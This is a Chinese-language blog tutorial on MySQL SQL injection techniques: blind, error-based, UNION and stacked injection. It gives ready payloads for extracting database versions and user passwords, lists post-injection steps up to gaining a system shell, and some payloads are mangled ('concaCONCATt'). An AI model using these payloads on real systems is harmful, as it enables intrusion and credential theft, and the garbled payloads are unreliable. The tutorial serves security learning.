mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入与堆叠注入

最新推荐文章于 2023-05-24 20:22:10 发布
最新推荐文章于 2023-05-24 20:22:10 发布
阅读量318 收藏
点赞数
文章标签: mysql 堆叠查询
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36403587/article/details/114786833
版权

盲注

关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据

布尔盲注

目标地址:http://newspaper.com/items.php?id=2

对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2

然后攻击者尝试返回 false 的查询:http://newspaper.com/items.php?id=2 and 1=2

对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2 and 1=2

如果网页应用存在 SQL 注入漏洞,那么其可能不会返回数据。为了确认这一点,攻击者会再次注入一次返回 true 的查询:http://newspaper.com/items.php?id=2 and 1=1

如果前后两次查询返回的网页内容不同,攻击者就能够通过组合 Payload 遍历出想要的数据。

时间盲注猜测密码的首字符是否为 ‘2’,是的话等待10秒。

对应 MySQL 语句为 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

报错注入完整的语句如 SELECT * FROM xxx WHERE id=1 AND ({Payload}),{Payload} 详细内容见下文

关键点是 构造错误信息,让自己想要的数据被输出到错误信息中

RAND

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

RAND(0) 0为随机函数的种子,该函数产生浮点数v,且v的范围为 0 <= v < 1.0

FLOOR(X) 取不大于 X 的最大整数

FLOOR(RAND(0)*2) 返回 0 或 1

0x3a 是 “:” 的 Unicode,单纯为了拼接好看

CONCAT() 拼接字符串

GROUP BY 按拼接字符串分组

COUNT(*) 记录的总数,这里会阻止 GROUP BY 直接优化得到 0 和 1 的结果

结合以上内容,当 FLOOR(RAND(0)*2) 出现重复值时,数据库会报错,报错信息类似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’

这样我们就可以从报错信息中获取到我们想要的信息,这次是数据库版本。

rand 的结果是随机的,也可以选择以下两种函数来构造错误信息。

ExtractValue

Description: 查询 XML 文档的函数

Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))

Output: - XPATH syntax error: '~5.5.53~'

UpdateXml

Description: 修改 XML 文档的函数

Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)

Output: - XPATH syntax error: '~5.5.53~'

UNION 查询注入UNION 语句合并多个 SELECT 语句的结果并返回

关键点:UNION 连接的多个 SELECT 语句中,每一列的数据类型应该相同,且选中相同数量的列。对于 Oracle 数据库,还要求 SELECT 必须使用 FORM 指定一个有效的表名。

确定列的数量使用 ORDER BY

依次使用以下序列中的语句,直到报错,如 The ORDER BY position number 3 is out of range of the number of items in the select list,进而确认列的数量。

1

2

31 ORDER BY 1--

1 ORDER BY 2--

1 ORDER BY 3--

使用 UNION SELECE NULL,...

NULL 可以被转为任意数据类型,所以这里可以用来作为返回值。

依次使用以下序列中的语句,直到报错,如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists,进而确认列的数量。

1

2

31 UNION SELECT NULL--

1 UNION SELECT NULL,NULL--

1 UNION SELECT NULL,NULL,NULL--

找到字符串类型的列

同样的,可以依次尝试以下序列:

1

2

3

41 UNION SELECT 'a',NULL,NULL,NULL--

1 UNION SELECT NULL,'a',NULL,NULL--

1 UNION SELECT NULL,NULL,'a',NULL--

1 UNION SELECT NULL,NULL,NULL,'a'--

如果对应的列与字符串类型不兼容,就会报错,如 Conversion failed when converting the varchar value ‘a’ to data type int ,所以如果不报错,我们就找到了字符串类型的列。

覆盖原有数据

注入点一般在 WHERE 处,使用 1 AND false UNION SELECT ... 将原有输出覆盖。

堆叠注入

堆叠注入指的是被注入方允许同时执行多条语句,那么攻击者就可以利用额外的语句完成任何操作。

敏感数据

成功注入后,接下来的流程一般是:

获取当前用户/数据库

获取用户名和密码

枚举数据库/表/列

尝试获取系统 shell

结合利用其他漏洞

Reference

写材料宝库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB渗透学习笔记4——堆叠注入和二次注入
林林木林林L的博客
07-24 2221
堆叠查询注入攻击 Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(
MySQL堆叠查询
u014650965的博客
06-20 280
堆叠查询攻击及预防办法
mysql 堆叠查询_Stacked injection--堆叠注入--堆查询注入
weixin_29144347的博客
01-27 277
Stackedinjection--堆叠注入--堆查询注入
mysql堆叠注入条件,SQL注入堆叠注入(堆查询注入
weixin_39945816的博客
03-23 635
Stached injection -- 堆叠注入0x00 堆叠注入的定义​ Stackedinjection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了不少的攻击手段,经过添加一个新的查询或者终止查询,能够达到修改数据和调用存储过程的目的。前端0x01 堆叠注入的原理​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下咱们在;结束一个sql语...
sql注入堆叠
qq_42307546的博客
01-11 350
堆叠查询:堆叠查询可以执行多条sql语句,语句之间以分号(;)隔开,而查询注入攻击就是利用此特点,在第二条语句构造要执行攻击的语句 在mysqlmysqli_multi_query和mysql_multi_query这两个函数执行一个或多个针对数据库的查询。多个查询用分号进行分割 但是堆叠查询只能返回第一条查询信息,不返回后面的信息,我们可以利用dnslog回显来得到数据 知道表列的情况下使用insert into 插入语句增加账号 id=-99’;insert into users(id,usernam
Mysql数据库使用concat函数执行SQL注入查询
09-10
MySQL数据库中的`CONCAT`函数在SQL注入场景中扮演着重要的角色,因为它允许攻击者将多个字段合并成一个字符串,从而获取原本无法直接查询到的信息。SQL注入是一种常见的安全漏洞,发生在应用程序未能充分验证用户...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入是一种常见的网络攻击技术,攻击者通过构造特殊的SQL代码片段,利用Web应用程序与数据库之间的交互漏洞来获取、修改或者删除数据库中的信息。过滤逗号是安全领域常见的一种防御SQL注入方法,因为SQL语句中...
超级SQL注入工具,支持布尔盲注,报错盲注union注入
最新发布
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
MySQLSQL 注入与防范方法
12-15
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对...
SQL注入堆叠注入
热门推荐
qq_45691294的博客
07-16 1万+
堆叠注入原理 堆叠注入,顾名思义,就是将语句堆叠在一起进行查询 原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句,例如 select * from users;show databases; 就同时执行以上两条命令,所以我们可以增删改查,只要权限够 虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函
SQL注入盲注堆叠注入
qq_43036356的博客
05-24 140
所谓盲注就是在服务器没有错误回显的时候完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”
SQL注入漏洞-07】堆叠查询靶场实战
cc
02-05 5978
堆叠查询的局限性: 堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。虽然我们前面提到了堆叠查询可以执行任意的sql语句,但是这种注入方式并不是十分的完美的。在我们的web系统中,因为代码通常只返回一个查询结果,因此,堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。如上面的实例如果我们不输出密码那我们是看不到这个结果的。因此,在读取数据时,我们建议使用union(联合)
SQL注入堆叠查询注入 实验过程
coderge's CSDN Blog.
09-18 670
本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库。 1 环境介绍 在堆叠注入页面中,程序获取GET参数ID,使用PDO的方式进行数据查询,但仍然将参数ID拼接到查询语句,导致PDO没起到预编译的效果,程序仍然存在SQL注入漏洞,代码如下所示。 <?php try { $conn = new PDO("mysql:host=localhost;dbname=security", "root", "qwer"); $conn->setAttribute(PDO
SQL注入漏洞(4)注入方法3 盲注
weixin_51339377的博客
03-18 1268
判定结果有还是没有有直接union select 会不会报错 会报错就报错注入,都没有就盲注 盲注---1.布尔盲注:(最好先猜出一个正确的用户名作为参照物才能进行盲注) 适用条件:不显示错误,也不显示任何数据库取出的内容显示 (没有闭合的报错 就要强行猜闭合方式) sqli-labs的T8 布尔盲注 ?id=1 正常 ?id=200000 不正常 ?id=1\ 不正常 ?id=haha 不正常 估计到数据库传入的参数是数字 尝试 id=1' --+ //正...
SQL注入07】堆叠注入基础及实操(基于sqli-labs-less38)
Fighting_hawk的博客
02-20 3884
1. 了解堆叠注入union联合查询注入的区别; 2. 了解堆叠注入的限制性因素; 3. 掌握手动堆叠注入方法
SQL-堆叠注入(含例题)
bin789456的博客
09-13 332
了解一下 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行
堆叠查询注入攻击
zjdda的博客
05-30 712
堆叠注入原理及介绍 Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下 一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injectio
sqli-labs】 less40 GET -Blind based -String -Stacked(GET型基于盲注堆叠查询字符型注入)...
ajxi63204的博客
01-30 144
提交,页面正常,说明是')闭合的 http://192.168.136.128/sqli-labs-master/Less-40/?id=1')%23 http://192.168.136.128/sqli-labs-master/Less-40/?id=1');insert into users(id,username,password) values (15,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值